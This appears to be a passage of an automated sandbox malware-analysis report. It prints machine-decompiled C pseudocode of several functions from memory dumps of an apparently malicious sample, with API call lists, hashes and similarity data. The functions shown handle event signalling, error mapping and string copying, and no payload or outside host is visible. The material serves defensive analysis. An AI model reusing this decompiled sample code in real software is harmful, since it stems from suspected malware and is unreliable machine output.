                                                                                                                                                                                                                                						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                                                                                                                						_t23 = _t16;
                                                                                                                                                                                                                                						if( *_t16 != 0) {
                                                                                                                                                                                                                                							E00A82C67(_t23);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					return _t38;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(E00A89B32(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t40 = CreateEventA(0xa8d2e4, 1, 0,  *0xa8d384);
                                                                                                                                                                                                                                				if(_t40 != 0) {
                                                                                                                                                                                                                                					SetEvent(_t40);
                                                                                                                                                                                                                                					Sleep(0xbb8);
                                                                                                                                                                                                                                					CloseHandle(_t40);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_push( &_v32);
                                                                                                                                                                                                                                				if(_a12 == 0) {
                                                                                                                                                                                                                                					_t29 = E00A82D1C(_t36);
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_t29 = E00A84847(_t36);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t41 = _v16;
                                                                                                                                                                                                                                				_t38 = _t29;
                                                                                                                                                                                                                                				if(_v16 != 0) {
                                                                                                                                                                                                                                					E00A8704F(_t41);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t39 = _a8;
                                                                                                                                                                                                                                					_t38 = E00A86C82( &_v32, _t39);
                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00A8D2E4,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,00A8A0EC,?,00000001,?), ref: 00A851BD
                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,00A8A0EC,?,00000001,?,00000002,?,?,00A858BD,?), ref: 00A851CA
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,00A8A0EC,?,00000001,?,00000002,?,?,00A858BD,?), ref: 00A851D5
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00A8A0EC,?,00000001,?,00000002,?,?,00A858BD,?), ref: 00A851DC
                                                                                                                                                                                                                                  • Part of subcall function 00A82D1C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A851FC,?,00A851FC,?,?,?,?,?,00A851FC,?), ref: 00A82DF6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2559942907-0
                                                                                                                                                                                                                                • Opcode ID: 25d8494c86fc28986e0886d27c11a7dbc9ca726c7e935be388595e71792d999c
                                                                                                                                                                                                                                • Instruction ID: d56f80a759f46c38eab4e1b98687dfe2b5b353ce7fb24abda5fe7159978c82c8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25d8494c86fc28986e0886d27c11a7dbc9ca726c7e935be388595e71792d999c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17218473D00619ABCF10BFF4C8859EEB7B9EB48354B054525FE51A7100EB34AD468BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DA397(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                                                                                                				intOrPtr _t16;
                                                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                				char _t31;
                                                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t40 = _a4;
                                                                                                                                                                                                                                				if(_t40 != 0) {
                                                                                                                                                                                                                                					_t31 = 0;
                                                                                                                                                                                                                                					__eflags =  *_t40;
                                                                                                                                                                                                                                					if( *_t40 != 0) {
                                                                                                                                                                                                                                						_t16 = E736DB595(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                                                                                						__eflags = _t16;
                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                							_t38 = _a8;
                                                                                                                                                                                                                                							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
                                                                                                                                                                                                                                							if(__eflags <= 0) {
                                                                                                                                                                                                                                								L11:
                                                                                                                                                                                                                                								_t17 = E736DB595(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
                                                                                                                                                                                                                                								__eflags = _t17;
                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
                                                                                                                                                                                                                                									_t19 = 0;
                                                                                                                                                                                                                                									__eflags = 0;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									E736DA1ED(GetLastError());
                                                                                                                                                                                                                                									_t19 =  *((intOrPtr*)(E736DA223(__eflags)));
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								L14:
                                                                                                                                                                                                                                								return _t19;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t19 = E736DA9DD(_t38, __eflags, _t16);
                                                                                                                                                                                                                                							__eflags = _t19;
                                                                                                                                                                                                                                							if(_t19 != 0) {
                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E736DA1ED(GetLastError());
                                                                                                                                                                                                                                						return  *((intOrPtr*)(E736DA223(__eflags)));
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t41 = _a8;
                                                                                                                                                                                                                                					__eflags =  *((intOrPtr*)(_t41 + 0xc));
                                                                                                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
                                                                                                                                                                                                                                						L2:
                                                                                                                                                                                                                                						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t29 = E736DA9DD(_t41, __eflags, 1);
                                                                                                                                                                                                                                					__eflags = _t29;
                                                                                                                                                                                                                                					if(_t29 != 0) {
                                                                                                                                                                                                                                						return _t29;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t41 = _a8;
                                                                                                                                                                                                                                				E736DA9C3(_t41);
                                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t41 + 8)) = 0;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t41 + 0xc)) = 0;
                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da3db
                                                                                                                                                                                                                                0x736da3a5
                                                                                                                                                                                                                                0x736da3aa
                                                                                                                                                                                                                                0x736da3af
                                                                                                                                                                                                                                0x736da3b1
                                                                                                                                                                                                                                0x736da3b4
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DA9C3: _free.LIBCMT ref: 736DA9D1
                                                                                                                                                                                                                                  • Part of subcall function 736DB595: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,736DD577,?,00000000,00000000), ref: 736DB637
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 736DA3FF
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 736DA406
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 736DA445
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 736DA44C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 167067550-0
                                                                                                                                                                                                                                • Opcode ID: 1b95f9ec2ae9dd671f9c9aadd9b7752d2b8528a185f7bf67f6aa80960e18865d
                                                                                                                                                                                                                                • Instruction ID: b085ce134d80df771b988b60bb94c99560f4084dbd39e7e15acff4a59fea7bc9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b95f9ec2ae9dd671f9c9aadd9b7752d2b8528a185f7bf67f6aa80960e18865d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C221C472628315BFEF119F66CC84B5AB7AEEF042647048514E82AD77C0D730DD1087A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                			E00A81A54(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                				int _t46;
                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                				int _t48;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t47 = __eax;
                                                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                                                				_push(__eax);
                                                                                                                                                                                                                                				_t39 = 0;
                                                                                                                                                                                                                                				_t46 = 0;
                                                                                                                                                                                                                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                				_v8 = _t26;
                                                                                                                                                                                                                                				if(_t26 < 0) {
                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v12 == 0) {
                                                                                                                                                                                                                                					Sleep(0xc8);
                                                                                                                                                                                                                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v8 >= _t39) {
                                                                                                                                                                                                                                					_t28 = _v12;
                                                                                                                                                                                                                                					if(_t28 != 0) {
                                                                                                                                                                                                                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                						_v8 = _t31;
                                                                                                                                                                                                                                						if(_t31 >= 0) {
                                                                                                                                                                                                                                							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                							if(_t46 != 0) {
                                                                                                                                                                                                                                								_t46 = _t46 + 1;
                                                                                                                                                                                                                                								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                								_t39 = E00A85157(_t48);
                                                                                                                                                                                                                                								if(_t39 == 0) {
                                                                                                                                                                                                                                									_v8 = 0x8007000e;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								__imp__#6(_v16);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t32 = _v12;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					 *_a4 = _t39;
                                                                                                                                                                                                                                					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1198164300-0
                                                                                                                                                                                                                                • Opcode ID: 0b52c1f7f0ac5d0646e4271f2a50b9b604ff87c5ef53b3c74879fa6db4c25d50
                                                                                                                                                                                                                                • Instruction ID: 67e9044e1d2e51bbf6947c703e16504b0b6e693dad42d1730c3816508fe49836
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b52c1f7f0ac5d0646e4271f2a50b9b604ff87c5ef53b3c74879fa6db4c25d50
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52214475901209EFCB11EFE4D988D9EBBB8FF48351B104169E905D7210E770DA41CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                			E736D9C93(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				intOrPtr _t2;
                                                                                                                                                                                                                                				long _t3;
                                                                                                                                                                                                                                				intOrPtr _t5;
                                                                                                                                                                                                                                				long _t6;
                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                				long _t10;
                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                				long _t56;
                                                                                                                                                                                                                                				long _t60;
                                                                                                                                                                                                                                				long _t61;
                                                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                                                				_t43 = __ecx;
                                                                                                                                                                                                                                				_t60 = GetLastError();
                                                                                                                                                                                                                                				_t2 =  *0x736eb050; // 0x4
                                                                                                                                                                                                                                				_t67 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					_t3 = E736DBC10(__eflags, _t2, 0xffffffff);
                                                                                                                                                                                                                                					__eflags = _t3;
                                                                                                                                                                                                                                					if(_t3 == 0) {
                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t51 = E736DA236(1, 0x364);
                                                                                                                                                                                                                                						_pop(_t43);
                                                                                                                                                                                                                                						__eflags = _t51;
                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                							__eflags = E736DBC10(__eflags,  *0x736eb050, _t51);
                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                								E736D9A91(_t51, 0x736efafc);
                                                                                                                                                                                                                                								E736DA293(0);
                                                                                                                                                                                                                                								_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t39 = 0;
                                                                                                                                                                                                                                								E736DBC10(__eflags,  *0x736eb050, 0);
                                                                                                                                                                                                                                								_push(_t51);
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t39 = 0;
                                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                                							E736DBC10(0,  *0x736eb050, 0);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							E736DA293();
                                                                                                                                                                                                                                							_pop(_t43);
                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t51 = E736DBBD1(_t67, _t2);
                                                                                                                                                                                                                                					if(_t51 == 0) {
                                                                                                                                                                                                                                						_t2 =  *0x736eb050; // 0x4
                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t51 != 0xffffffff) {
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t39 = _t51;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							L3:
                                                                                                                                                                                                                                							_t39 = 0;
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							_t51 = _t39;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				SetLastError(_t60);
                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                				_t53 =  ~_t51 & _t39;
                                                                                                                                                                                                                                				if(_t53 == 0) {
                                                                                                                                                                                                                                					E736D9798(_t39, _t43, _t49, _t53, _t60);
                                                                                                                                                                                                                                					asm("int3");
                                                                                                                                                                                                                                					_t5 =  *0x736eb050; // 0x4
                                                                                                                                                                                                                                					_push(_t60);
                                                                                                                                                                                                                                					__eflags = _t5 - 0xffffffff;
                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                						L22:
                                                                                                                                                                                                                                						_t6 = E736DBC10(__eflags, _t5, 0xffffffff);
                                                                                                                                                                                                                                						__eflags = _t6;
                                                                                                                                                                                                                                						if(_t6 == 0) {
                                                                                                                                                                                                                                							goto L31;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t60 = E736DA236(1, 0x364);
                                                                                                                                                                                                                                							_pop(_t43);
                                                                                                                                                                                                                                							__eflags = _t60;
                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                								__eflags = E736DBC10(__eflags,  *0x736eb050, _t60);
                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                									E736D9A91(_t60, 0x736efafc);
                                                                                                                                                                                                                                									E736DA293(0);
                                                                                                                                                                                                                                									_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                									goto L29;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									E736DBC10(__eflags,  *0x736eb050, _t21);
                                                                                                                                                                                                                                									_push(_t60);
                                                                                                                                                                                                                                									goto L25;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								E736DBC10(__eflags,  *0x736eb050, _t20);
                                                                                                                                                                                                                                								_push(_t60);
                                                                                                                                                                                                                                								L25:
                                                                                                                                                                                                                                								E736DA293();
                                                                                                                                                                                                                                								_pop(_t43);
                                                                                                                                                                                                                                								goto L31;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t60 = E736DBBD1(__eflags, _t5);
                                                                                                                                                                                                                                						__eflags = _t60;
                                                                                                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                                                                                                							_t5 =  *0x736eb050; // 0x4
                                                                                                                                                                                                                                							goto L22;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags = _t60 - 0xffffffff;
                                                                                                                                                                                                                                							if(_t60 == 0xffffffff) {
                                                                                                                                                                                                                                								L31:
                                                                                                                                                                                                                                								E736D9798(_t39, _t43, _t49, _t53, _t60);
                                                                                                                                                                                                                                								asm("int3");
                                                                                                                                                                                                                                								_push(_t39);
                                                                                                                                                                                                                                								_push(_t60);
                                                                                                                                                                                                                                								_push(_t53);
                                                                                                                                                                                                                                								_t61 = GetLastError();
                                                                                                                                                                                                                                								_t9 =  *0x736eb050; // 0x4
                                                                                                                                                                                                                                								__eflags = _t9 - 0xffffffff;
                                                                                                                                                                                                                                								if(__eflags == 0) {
                                                                                                                                                                                                                                									L38:
                                                                                                                                                                                                                                									_t10 = E736DBC10(__eflags, _t9, 0xffffffff);
                                                                                                                                                                                                                                									__eflags = _t10;
                                                                                                                                                                                                                                									if(_t10 == 0) {
                                                                                                                                                                                                                                										goto L35;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t54 = E736DA236(1, 0x364);
                                                                                                                                                                                                                                										__eflags = _t54;
                                                                                                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                                                                                                											__eflags = E736DBC10(__eflags,  *0x736eb050, _t54);
                                                                                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                                                                                												E736D9A91(_t54, 0x736efafc);
                                                                                                                                                                                                                                												E736DA293(0);
                                                                                                                                                                                                                                												goto L45;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												_t40 = 0;
                                                                                                                                                                                                                                												E736DBC10(__eflags,  *0x736eb050, 0);
                                                                                                                                                                                                                                												_push(_t54);
                                                                                                                                                                                                                                												goto L41;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t40 = 0;
                                                                                                                                                                                                                                											__eflags = 0;
                                                                                                                                                                                                                                											E736DBC10(0,  *0x736eb050, 0);
                                                                                                                                                                                                                                											_push(0);
                                                                                                                                                                                                                                											L41:
                                                                                                                                                                                                                                											E736DA293();
                                                                                                                                                                                                                                											goto L36;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t54 = E736DBBD1(__eflags, _t9);
                                                                                                                                                                                                                                									__eflags = _t54;
                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                										_t9 =  *0x736eb050; // 0x4
                                                                                                                                                                                                                                										goto L38;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										__eflags = _t54 - 0xffffffff;
                                                                                                                                                                                                                                										if(_t54 != 0xffffffff) {
                                                                                                                                                                                                                                											L45:
                                                                                                                                                                                                                                											_t40 = _t54;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											L35:
                                                                                                                                                                                                                                											_t40 = 0;
                                                                                                                                                                                                                                											__eflags = 0;
                                                                                                                                                                                                                                											L36:
                                                                                                                                                                                                                                											_t54 = _t40;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								SetLastError(_t61);
                                                                                                                                                                                                                                								asm("sbb edi, edi");
                                                                                                                                                                                                                                								_t56 =  ~_t54 & _t40;
                                                                                                                                                                                                                                								__eflags = _t56;
                                                                                                                                                                                                                                								return _t56;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								L29:
                                                                                                                                                                                                                                								__eflags = _t60;
                                                                                                                                                                                                                                								if(_t60 == 0) {
                                                                                                                                                                                                                                									goto L31;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									return _t60;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					return _t53;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                0x736d9cf5
                                                                                                                                                                                                                                0x736d9cfa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9cfa
                                                                                                                                                                                                                                0x736d9ce4
                                                                                                                                                                                                                                0x736d9caa
                                                                                                                                                                                                                                0x736d9cb0
                                                                                                                                                                                                                                0x736d9cb4
                                                                                                                                                                                                                                0x736d9cc1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9cb6
                                                                                                                                                                                                                                0x736d9cb9
                                                                                                                                                                                                                                0x736d9d33
                                                                                                                                                                                                                                0x736d9d33
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cb9
                                                                                                                                                                                                                                0x736d9cb4
                                                                                                                                                                                                                                0x736d9d36
                                                                                                                                                                                                                                0x736d9d3e
                                                                                                                                                                                                                                0x736d9d40
                                                                                                                                                                                                                                0x736d9d42
                                                                                                                                                                                                                                0x736d9d4a
                                                                                                                                                                                                                                0x736d9d4f
                                                                                                                                                                                                                                0x736d9d50
                                                                                                                                                                                                                                0x736d9d55
                                                                                                                                                                                                                                0x736d9d56
                                                                                                                                                                                                                                0x736d9d59
                                                                                                                                                                                                                                0x736d9d73
                                                                                                                                                                                                                                0x736d9d76
                                                                                                                                                                                                                                0x736d9d7b
                                                                                                                                                                                                                                0x736d9d7d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d7f
                                                                                                                                                                                                                                0x736d9d8b
                                                                                                                                                                                                                                0x736d9d8e
                                                                                                                                                                                                                                0x736d9d8f
                                                                                                                                                                                                                                0x736d9d91
                                                                                                                                                                                                                                0x736d9db4
                                                                                                                                                                                                                                0x736d9db6
                                                                                                                                                                                                                                0x736d9dcd
                                                                                                                                                                                                                                0x736d9dd4
                                                                                                                                                                                                                                0x736d9dd9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9db8
                                                                                                                                                                                                                                0x736d9dbf
                                                                                                                                                                                                                                0x736d9dc4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9dc4
                                                                                                                                                                                                                                0x736d9d93
                                                                                                                                                                                                                                0x736d9d9a
                                                                                                                                                                                                                                0x736d9d9f
                                                                                                                                                                                                                                0x736d9da0
                                                                                                                                                                                                                                0x736d9da0
                                                                                                                                                                                                                                0x736d9da5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9da5
                                                                                                                                                                                                                                0x736d9d91
                                                                                                                                                                                                                                0x736d9d5b
                                                                                                                                                                                                                                0x736d9d61
                                                                                                                                                                                                                                0x736d9d63
                                                                                                                                                                                                                                0x736d9d65
                                                                                                                                                                                                                                0x736d9d6e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d67
                                                                                                                                                                                                                                0x736d9d67
                                                                                                                                                                                                                                0x736d9d6a
                                                                                                                                                                                                                                0x736d9de4
                                                                                                                                                                                                                                0x736d9de4
                                                                                                                                                                                                                                0x736d9de9
                                                                                                                                                                                                                                0x736d9dec
                                                                                                                                                                                                                                0x736d9ded
                                                                                                                                                                                                                                0x736d9dee
                                                                                                                                                                                                                                0x736d9df5
                                                                                                                                                                                                                                0x736d9df7
                                                                                                                                                                                                                                0x736d9dfc
                                                                                                                                                                                                                                0x736d9dff
                                                                                                                                                                                                                                0x736d9e1d
                                                                                                                                                                                                                                0x736d9e20
                                                                                                                                                                                                                                0x736d9e25
                                                                                                                                                                                                                                0x736d9e27
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e29
                                                                                                                                                                                                                                0x736d9e35
